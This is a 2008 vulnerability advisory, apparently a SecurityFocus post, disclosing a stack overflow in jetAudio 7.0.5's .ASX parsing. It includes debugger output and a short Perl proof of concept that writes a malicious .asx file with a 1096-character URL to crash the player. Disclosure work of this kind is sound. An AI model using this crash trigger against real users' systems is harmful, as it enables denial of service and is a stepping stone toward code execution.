jetAudio <= 7.0.5 (.ASX) Remote Stack Overflow Feb 08 2008 07:01PM
laurent gaffie gmail com
Application: jetAudio 7.0.5 (.ASX) Remote Stack Overflow

Web Site: http://www.cowonamerica.com/download/

Platform: Windows

Bug:Remote Stack Overflow

Extension: ASX

special condition: none

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Credits

===========

1) Introduction

===========

A nice introduction to jetaudio can be found : http://www.cowonamerica.com/products/jetaudio/

======

2) Bug

======

When parsing an asx file with a long URL a stack overflow occurs.

=====

3)Proof of concept

=====

Proof of concept example :

An url with 1096 A ( http://AAAAA....) will overwritte ESI and crash the program

Here's the debugger output:

Access violation - code c0000005

eax=00000000 ebx=01187684 ecx=00000459 edx=0012d39c esi=41414141 edi=00000001

eip=00441dad esp=0012cf3c ebp=00000001 iopl=0 nv up ei pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206

JetAudio!CxImage::`copy constructor closure'+0x1109d:

00441dad 8b06 mov eax,[esi] ds:0023:41414141=????????

Here's the the Poc :

#!/usr/local/bin/perl

use strict;

use warnings;

my $file="myfile.asx";

my $payload = "A" x 1096;

open( $FILE, ">>$file") or die "Cannot open $file: $!";

print $FILE "http://".$payload;

close($FILE);

print "$file has been created \n";

=====

5)Credits

=====

laurent gaffié

laurent.gaffie{remove_this}[at]gmail[dot]com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus